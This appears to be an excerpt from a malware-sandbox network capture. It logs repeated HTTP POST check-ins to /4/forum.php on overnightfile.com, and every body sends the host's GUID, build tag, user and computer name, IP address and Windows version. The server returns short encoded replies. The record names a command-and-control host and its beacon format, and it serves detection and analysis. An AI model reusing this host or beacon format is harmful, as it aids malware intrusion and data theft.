                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.910614967 CEST821INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHBYSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:20.499816895 CEST822OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:20.595278978 CEST822INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 46 55 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTFUGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:20.936074018 CEST823OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:21.027698994 CEST823INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTHSGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:21.336246967 CEST823OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:21.427649975 CEST824INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMMNNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:21.947421074 CEST824OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:22.038686037 CEST824INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHBYSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:22.383347988 CEST825OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:22.474579096 CEST825INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4b 50 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGKPTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.013705015 CEST825OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.105078936 CEST826INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZFUAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.421612024 CEST826OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.515053034 CEST826INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.847744942 CEST827OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.941159010 CEST827INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGMNTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:24.291476011 CEST828OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:24.382613897 CEST828INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFBYUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:24.686016083 CEST828OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:24.774272919 CEST829INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHAZSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.090848923 CEST829OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.178890944 CEST829INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNJQMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.473553896 CEST830OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.564625025 CEST830INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQZAJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.890580893 CEST830OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.979252100 CEST831INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNZAMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:26.269500971 CEST831OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:26.358181000 CEST831INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZNMAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:26.666646004 CEST832OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:26.754947901 CEST832INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 51 4a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTQJGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:27.062346935 CEST833OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:27.157646894 CEST833INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGYBTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:27.488862038 CEST833OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
